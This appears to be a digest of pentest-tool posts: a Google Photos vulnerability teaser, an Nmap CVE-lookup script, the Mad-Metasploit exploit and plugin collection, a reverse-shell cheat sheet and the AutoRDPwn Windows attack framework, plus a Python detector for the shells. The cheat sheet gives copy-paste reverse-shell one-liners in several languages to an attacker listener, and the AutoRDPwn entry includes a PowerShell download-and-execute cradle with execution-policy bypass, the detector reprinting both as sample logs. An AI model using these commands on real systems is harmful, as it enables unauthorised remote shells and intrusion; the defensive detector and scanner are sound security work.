Now-Patched Google Photos Vulnerability Let Hackers Track Your Friends and Location History

A now-patched vulnerability in the web version of Google Photos allowed malicious websites to expose where, when, and with whom your photos were taken.

Background

One trillion photos were taken in 2018. With image quality and file size increasing, it's obvious why more and more people choose to host their photos on services like iCloud, […]
The post Now-Patched Google Photos Vulnerability Let Hackers Track Your Friends and Location History appeared first on Blog.

Link: http://feedproxy.google.com/~r/Imperviews/~3/_RXLkA6k_as/

Freevulnsearch – Free And Open NMAP NSE Script To Query Vulnerabilities Via The cve-search.org API

This Nmap NSE script is part of the free OCSAF project (https://freecybersecurity.org). Used together with Nmap's version scan (-sV), it automatically assigns the matching vulnerabilities by CVE (Common Vulnerabilities and Exposures) and rates each one by CVSS (Common Vulnerability Scoring System). For clarity, the CVSS scores are also mapped onto the CVSS v3.0 qualitative ratings:

  Critical (CVSS 9.0 – 10.0)
  High     (CVSS 7.0 – 8.9)
  Medium   (CVSS 4.0 – 6.9)
  Low      (CVSS 0.1 – 3.9)
  None     (CVSS 0.0)

By default the CVEs are looked up, using the CPEs that Nmap determines, via the public API of the cve-search.org project, which is provided by circl.lu. For more information visit https://www.cve-search.org/api/.

Confidentiality information: every query sends the determined CPE to the circl.lu API, so the operator of that service learns which products and versions you are scanning (and, if you disable TLS as described below, so does anyone on the network path). For the confidentiality terms of the circl.lu API, see https://www.circl.lu/services/cve-search/ directly. The best option is to install cve-search (https://github.com/cve-search/cve-search) locally and point the script at your own API with the apipath argument (set it to the URL of your instance):

  nmap -sV --script freevulnsearch --script-args apipath= <target>

Installation: you can either give the script path directly on the Nmap command line, for example

  nmap -sV --script ~/freevulnsearch <target>

or copy the script into the scripts directory of your Nmap installation (in Kali Linux™, for example, /usr/share/nmap/scripts/) and then run

  sudo nmap --script-updatedb

Important note: read the confidentiality information first. It is recommended to run freevulnsearch.nse on its own, without additional NSE scripts. The script is assigned to the categories safe, vuln and external; if you do not want it to run whenever one of those categories is selected, do not run the nmap --script-updatedb command above.

Usage: simply combine Nmap's -sV with this script:

  nmap -sV --script freevulnsearch <target>

According to my tests, when many requests are sent to the API at the same time, only plain HTTP without TLS was stable. For this reason you can optionally disable TLS with a script argument; be aware that the API queries to circl.lu then travel unencrypted:

  nmap -sV --script freevulnsearch --script-args notls=yes <target>

If you scan with the categories safe or vuln, exclude the script or the category external, or do not add the script to Nmap's default scripts directory. Again, it is recommended to run freevulnsearch.nse separately, without other NSE scripts.

CPE exception handling for format: if an Nmap CPE is not matched as reported, several functions in freevulnsearch.nse check whether the version part of the CPE is formatted inaccurately and rewrite it. For example:

  (MySQL)      5.0.51a-3ubuntu5 -> 5.0.51a
  (Exim smtpd) 4.90_1           -> 4.90
  (OpenSSH)    6.6.1p1          -> 6.6:p1
  (OpenSSH)    7.5p1            -> 7.5:p1
  ...

Download Freevulnsearch
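The version clean-ups, the CVSS severity bands and the cve-search lookup described above, as an added example in Python. This is not the freevulnsearch.nse Lua script and not cve-search code; it assumes the /api/cvefor/<cpe> route of the cve-search API (with https://cve.circl.lu/api as the public instance), and the field names "id" and "cvss" in the constructed sample response, whose CVE ids are placeholders rather than real entries.

```python
"""
Prepare an Nmap-reported CPE for a cve-search lookup and bucket the returned
CVEs by CVSS severity, following the rules the write-up above describes.

Added example for this digest; not the freevulnsearch.nse Lua script and not
cve-search code. Assumptions: the /api/cvefor/<cpe> route of the cve-search
API, and the field names "id" and "cvss" in the constructed SAMPLE_RESPONSE
below, whose CVE ids are placeholders.
"""
import re
from typing import Dict, List, Tuple
from urllib.parse import quote

DEFAULT_API = "https://cve.circl.lu/api"   # assumed public circl.lu instance


def severity(score: float) -> str:
    """CVSS v3.0 qualitative rating, using the bands listed on the page."""
    if not 0.0 <= score <= 10.0:
        raise ValueError(f"CVSS score out of range: {score}")
    if score == 0.0:
        return "None"
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    if score < 9.0:
        return "High"
    return "Critical"


def normalize_version(version: str) -> str:
    """Apply the page's version clean-ups so the CPE matches cve-search data."""
    v = version.split("-", 1)[0]                 # 5.0.51a-3ubuntu5 -> 5.0.51a
    v = re.sub(r"_\d+$", "", v)                  # 4.90_1 -> 4.90
    m = re.fullmatch(r"(\d+\.\d+)(?:\.\d+)?p(\d+)", v)
    if m:                                        # 6.6.1p1 -> 6.6:p1, 7.5p1 -> 7.5:p1
        v = f"{m.group(1)}:p{m.group(2)}"
    return v


def normalize_cpe(cpe: str) -> str:
    """Rewrite the version field of an Nmap CPE 2.2 URI (cpe:/a:vendor:product:version)."""
    fields = cpe.split(":")
    if len(fields) < 5:                          # no version reported: nothing to fix
        return cpe
    fields[4] = normalize_version(fields[4])
    return ":".join(fields)


def cvefor_url(cpe: str, apipath: str = DEFAULT_API, tls: bool = True) -> str:
    """Build the lookup URL. tls=False mirrors the script's notls=yes argument,
    which means the CPE travels in clear text to the API host."""
    base = apipath.rstrip("/")
    if not tls:
        base = re.sub(r"^https://", "http://", base)
    return f"{base}/cvefor/{quote(cpe, safe=':/')}"


def bucket(cves: List[Dict]) -> Dict[str, List[Tuple[str, float]]]:
    """Group (id, score) pairs by rating, highest score first in each group.
    Entries without a score are rated "None" (0.0) instead of being dropped."""
    groups: Dict[str, List[Tuple[str, float]]] = {
        k: [] for k in ("Critical", "High", "Medium", "Low", "None")}
    for entry in cves:
        score = float(entry.get("cvss") or 0.0)
        groups[severity(score)].append((entry["id"], score))
    for items in groups.values():
        items.sort(key=lambda item: -item[1])
    return groups


# Constructed stand-in for a cvefor answer; the ids are placeholders, not real CVEs.
SAMPLE_RESPONSE = [
    {"id": "CVE-0000-0001", "cvss": 9.8},
    {"id": "CVE-0000-0002", "cvss": 7.5},
    {"id": "CVE-0000-0003", "cvss": 4.3},
    {"id": "CVE-0000-0004", "cvss": 2.1},
    {"id": "CVE-0000-0005", "cvss": None},
]

if __name__ == "__main__":
    cpe = normalize_cpe("cpe:/a:openbsd:openssh:7.5p1")   # as Nmap -sV would report it
    print("query:", cvefor_url(cpe))
    for rating, items in bucket(SAMPLE_RESPONSE).items():
        for cve_id, score in items:
            print(f"{rating:8} {score:4.1f} {cve_id}")
```

Run it to see the rewritten OpenSSH CPE and the bucketed sample; replace SAMPLE_RESPONSE with the JSON returned by your own cve-search instance to use it against real scan output.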

Link: http://www.kitploit.com/2019/03/freevulnsearch-free-and-open-nmap-nse.html

Mad-Metasploit – Metasploit Custom Modules, Plugins & Resource Scripts

Metasploit custom modules, plugins, resource scripts and an awesome Metasploit collection.
https://www.hahwul.com/p/mad-metasploit.html

Awesome: open awesome.md

Add mad-metasploit to metasploit-framework

1. Configure your metasploit-framework directory:
   $ vim config/config.rb
   $metasploit_path = '/opt/metasploit-framework/embedded/framework/'
   # or /usr/share/metasploit-framework

2-A. Interactive mode:
   $ ./mad-metasploit

2-B. Command-line mode (preset all):
   $ ./mad-metasploit [-a/-y/--all/--yes]

Use custom modules: search auxiliary, exploits and others as usual.
   HAHWUL > search springboot

   Matching Modules
   ================
      Name                                          Disclosure Date  Rank    Check  Description
      ----                                          ---------------  ----    -----  -----------
      auxiliary/mad_metasploit/springboot_actuator                   normal  No     Springboot actuator check

Use custom plugins: load mad-metasploit/{plugin} in msfconsole.
   HAHWUL > load mad-metasploit/db_autopwn
   [*] Successfully loaded plugin: db_autopwn
   HAHWUL > db_autopwn
   [-] The db_autopwn command is DEPRECATED
   [-] See http://r-7.co/xY65Zr instead
   [*] Usage: db_autopwn [options]
       -h           Display this help text
       -t           Show all matching exploit modules
       -x           Select modules based on vulnerability references
       -p           Select modules based on open ports
       -e           Launch exploits against all matched targets
       -r           Use a reverse connect shell
       -b           Use a bind shell on a random port (default)
       -q           Disable exploit module output
       -R [rank]    Only run modules with a minimal rank
       -I [range]   Only exploit hosts inside this range
       -X [range]   Always exclude hosts inside this range
       -PI [range]  Only exploit hosts with these ports open
       -PX [range]  Always exclude hosts with these ports open
       -m [regex]   Only run modules whose name matches the regex
       -T [secs]    Maximum runtime for any exploit in seconds
   etc...

List of plugins:
   mad-metasploit/db_autopwn
   mad-metasploit/arachni
   mad-metasploit/meta_ssh
   mad-metasploit/db_exploit

Use resource scripts:
   #> msfconsole
   MSF> load alias
   MSF> alias ahosts 'resource /mad-metasploit/resource-script/ahosts.rc'
   MSF> ahosts   [Custom command!]

List of resource scripts:
   ahosts.rc
   cache_bomb.rb
   feed.rc
   getdomains.rb
   getsessions.rb
   ie_hashgrab.rb
   listdrives.rb
   loggedon.rb
   runon_netview.rb
   search_hash_creds.rc
   virusscan_bypass8_8.rb

Archive (informal Metasploit modules):
   archive/
   └── exploits
       ├── aix
       │   ├── dos
       │   │   ├── 16657.rb
       │   │   └── 16929.rb
       │   ├── local
       │   │   └── 16659.rb
       │   └── remote
       │       └── 16930.rb
       ├── android
       │   ├── local
       │   │   ├── 40504.rb
       │   │   ├── 40975.rb
       │   │   └── 41675.rb
       │   └── remote
       │       ├── 35282.rb
       │       ├── 39328.rb
       │       ├── 40436.rb
       │       └── 43376.rb
       .....

Patch mad-metasploit-archive (the framework loads exploit modules from modules/exploits/, so link the archive there):
   #> ln -s mad-metasploit-archive /usr/share/metasploit-framework/modules/exploits/mad-metasploit-archive
   #> msfconsole
   MSF> search [string!]
   ..
   exploit/multi/~~~
   exploit/mad-metasploit-archive/[custom-script!!]
   ..

How to update?
   mad-metasploit:
   $ ./mad-metasploit -u

   mad-metasploit-archive:
   $ ruby auto_archive.rb
   or
   $ ./mad-metasploit
   [+] Sync Mad-Metasploit Modules/Plugins/Resource-Script to Metasploit-framework
   [+] Metasploit-framework directory: /opt/metasploit-framework/embedded/framework/ (set ./conf/config.rb)
   [*] Update archive(Those that are not added as msf)? [y/N] y
   [-] Download index data..

How to remove mad-metasploit?
   $ ./mad-metasploit -r
   or
   $ ./mad-metasploit --remove

Development
   Hello world..!
   $ git clone https://github.com/hahwul/mad-metasploit

   Add your custom code to:
   ./mad-metasploit-modules
      + exploit
      + auxiliary
      + etc...
   ./mad-metasploit-plugins
   ./mad-metasploit-resource-script

   New idea: open an issue with the idea tag.

Contributing
   Bug reports and pull requests are welcome on GitHub. (This project is intended to be a safe)

Download Mad-Metasploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/D8ExNN2Y8Rs/mad-metasploit-metasploit-custom.html

Reverse Shell Cheat Sheet

If you're lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you'll probably want an interactive shell.

If it's not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either throwing back a reverse shell or binding a shell to a TCP port. This page deals with the former.

Your options for creating a reverse shell are limited by the scripting languages installed on the target system, though you could probably upload a binary program too if you're suitably well prepared.

The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you substitute "/bin/sh -i" with "cmd.exe".

Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they're quite short lines, but not very readable. In every example the attacker's listener is at 192.168.0.5, TCP port 4444 (for example: nc -lvnp 4444).

PHP:
  php -r '$sock=fsockopen("192.168.0.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
  (This assumes the socket is file descriptor 3. If the PHP process already has other descriptors open, try 4, 5 or 6.)

Python:
  python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash:
  bash -i >& /dev/tcp/192.168.0.5/4444 0>&1

Netcat:
  nc -e /bin/sh 192.168.0.5 4444
  (Only netcat builds that have the -e option support this; OpenBSD netcat does not.)

Perl:
  perl -e 'use Socket;$i="192.168.0.5";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby:
  ruby -rsocket -e 'f=TCPSocket.open("192.168.0.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java (written in Groovy syntax, as accepted by script consoles):
  r = Runtime.getRuntime()
  p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.5/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
  p.waitFor()

xterm:
  xterm -display 192.168.0.5:4444
  (X display N is TCP port 6000+N, so this connects to port 10444. The attacker needs an X server listening on that display, for example Xnest :4444, with the target allowed via xhost.)

Source: Reverse-Shell-Cheatsheet

Link: http://feedproxy.google.com/~r/PentestTools/~3/Ygxu7rgH7jo/reverse-shell-cheat-sheet.html

AutoRDPwn v4.8 – The Shadow Attack Framework

AutoRDPwn is a script written in PowerShell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view the victim's desktop without their consent, and even to control it on request. For it to work correctly, the requirements described in the user guide must be met.

Requirements
  PowerShell 4.0 or higher

Changes in version 4.8
  • Compatibility with PowerShell 4.0
  • Automatic copy of output (passwords, hashes, dumps, etc.) to the clipboard
  • Automatic exclusion in Windows Defender (4 different methods)
  • Remote execution without a password for PsExec, WMI and Invoke-Command
  • New attack available: DCOM Passwordless Execution
  • New module available: Remote Access / Metasploit Web Delivery
  • New module available: Remote VNC Server (designed for legacy environments)
  • Autocompletion of the host, user and password fields by pressing Enter
  • The tool can now be run without administrator privileges with the -noadmin parameter
  * The rest of the changes can be consulted in the CHANGELOG file

Use
This application can be used locally, remotely, or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files, or even recover the history of RDP connections or the passwords of wireless networks.

One-line execution (this fetches the script over HTTPS into the temp directory and runs it with the execution policy bypassed):
  powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Credits and Acknowledgments
  • Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
  • HarmJ0y & Matt Graeber for their script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell
  • Stas'M Corp. for its RDP Wrapper tool -> https://github.com/stascorp/rdpwrap
  • Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
  • Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz
  • Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0m

Contact
This software does not offer any kind of guarantee. Its use is exclusively for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can contact info@darkbyte.net

Download AutoRDPwn
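The defensive counterpart to two of the entries in this digest, as an added example in Python: a small rule set that flags process-execution records matching the reverse-shell one-liners from the Reverse Shell Cheat Sheet above and the download-and-run PowerShell cradle used to launch AutoRDPwn. This is not code from the cheat sheet, from AutoRDPwn or from any other tool on the page; the record layout ("... cmdline=<command line>") and the SAMPLE_LOG records are constructed for the example and do not represent a real log format or real captured data.

```python
"""
Scan process-execution records for the reverse-shell one-liners in the cheat
sheet above and for the PowerShell download cradle that launches AutoRDPwn.

Added example for this digest; not code from the cheat sheet, from AutoRDPwn
or from any other tool on the page. The record layout ("cmdline=<command>")
and the SAMPLE_LOG records below are constructed, not a real log format.
"""
import re
from typing import List, Tuple

# Each rule pairs a label with a regex over the raw command line. The regexes
# are written against the exact shapes of the one-liners on this page, so they
# are a starting point for a detection, not a complete reverse-shell signature set.
RULES = [
    ("bash /dev/tcp redirect",
     re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("netcat -e shell",
     re.compile(r"\bnc\b.*\s-e\s+\S*sh\b")),
    ("php fsockopen + exec",
     re.compile(r"fsockopen\(.*\bexec\(")),
    ("python socket + dup2",
     re.compile(r"socket\.socket\(.*os\.dup2\(")),
    ("perl Socket + exec",
     re.compile(r"use Socket;.*\bexec\(")),
    ("ruby TCPSocket + exec",
     re.compile(r"TCPSocket\.open\(.*\bexec\b")),
    ("xterm to remote display",
     re.compile(r"\bxterm\b.*-display\s+\d{1,3}(?:\.\d{1,3}){3}:\d+")),
    ("powershell download cradle",
     re.compile(r"powershell.*-ep\s+bypass.*\b(?:iwr|Invoke-WebRequest|DownloadString|DownloadFile)\b",
                re.IGNORECASE)),
]

SAMPLE_LOG = [
    # constructed benign records
    "2019-03-21T10:00:01Z host=web01 uid=33 cmdline=nc -z -w1 127.0.0.1 22",
    "2019-03-21T10:00:02Z host=web01 uid=33 cmdline=python -c 'import json; print(json.dumps({}))'",
    "2019-03-21T10:00:03Z host=adm01 uid=1000 cmdline=powershell -Command Get-Process",
    # constructed records of the page's one-liners, as a target would log them
    "2019-03-21T10:01:00Z host=web01 uid=33 cmdline=bash -i >& /dev/tcp/192.168.0.5/4444 0>&1",
    "2019-03-21T10:01:05Z host=web01 uid=33 cmdline=nc -e /bin/sh 192.168.0.5 4444",
    "2019-03-21T10:01:10Z host=web01 uid=33 cmdline=php -r '$sock=fsockopen(\"192.168.0.5\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "2019-03-21T10:01:15Z host=web01 uid=33 cmdline=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    "2019-03-21T10:01:20Z host=web01 uid=33 cmdline=perl -e 'use Socket;$i=\"192.168.0.5\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'",
    "2019-03-21T10:01:25Z host=web01 uid=33 cmdline=ruby -rsocket -e 'f=TCPSocket.open(\"192.168.0.5\",4444).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'",
    "2019-03-21T10:01:30Z host=web01 uid=33 cmdline=xterm -display 192.168.0.5:4444",
    r'2019-03-21T10:02:00Z host=adm01 uid=1000 cmdline=powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"',
]


def command_line(record: str) -> str:
    """Return the command line from a record, or '' when the field is absent."""
    _, sep, cmd = record.partition("cmdline=")
    return cmd.strip() if sep else ""


def classify(cmdline: str) -> List[str]:
    """Return the labels of every rule the command line triggers (empty if none)."""
    return [label for label, rx in RULES if rx.search(cmdline)]


def scan(records: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Return (record number, command line, labels) for each flagged record."""
    hits = []
    for number, record in enumerate(records, start=1):
        cmd = command_line(record)
        labels = classify(cmd)
        if labels:
            hits.append((number, cmd, labels))
    return hits


if __name__ == "__main__":
    for number, cmd, labels in scan(SAMPLE_LOG):
        print(f"record {number}: {', '.join(labels)}\n    {cmd}")
```

The benign records (a port check with nc, a harmless python -c, a plain PowerShell command) pass because each rule requires the combination that makes the one-liner a shell, not just the interpreter name; feed the same function the command-line field of your own execution telemetry to reuse it.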

Link: http://www.kitploit.com/2019/03/autordpwn-v48-shadow-attack-framework.html